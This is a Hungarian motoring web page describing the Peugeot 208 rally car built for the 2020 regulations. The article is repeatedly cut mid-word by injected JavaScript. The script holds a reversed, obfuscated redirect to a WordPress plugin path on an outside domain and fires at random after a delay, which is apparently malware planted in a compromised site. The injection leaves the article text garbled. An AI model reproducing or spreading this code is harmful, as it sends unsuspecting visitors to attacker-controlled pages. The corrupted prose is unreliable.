Kezdőlap Férfi Peugeot 208

Peugeot 208

A 2020-as évadra módosítoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott szabályzathoz és elnevezéshez igazodva teljesen új raliautóval jelentkezett a Peugeot Sport. A fejlesztés 2018 nyara óta zajlik, párhuzamosan az alapját adó, új generációs 208-aséval. Nagyon sok közös persze nincs a két típusban a CMP padlólemezen, valamint az 1,2 literes blokkon kívül. A versenyautó állítható Öhlins lengéscsillapítókat kapott; a fékek hátul 290 mm-esek, elöl aszfaltra 330, murvára 290 mm-es tárcsát ajánlanak a fejlesztők.A 2020-ra módosuló szabályzathoz igazodva nehezebb lett az autó – 1030-ról 1080 kilogrammra nőt az üres tömeg. A korábbi 1,6 literes motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor (185 LE, 190 Nm) helyébe az 1,2 literes, háromhengeres turbómotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor kiélezett verziója lép….

- Hirdetés -
MEGOSZTÁS
- Hirdetés -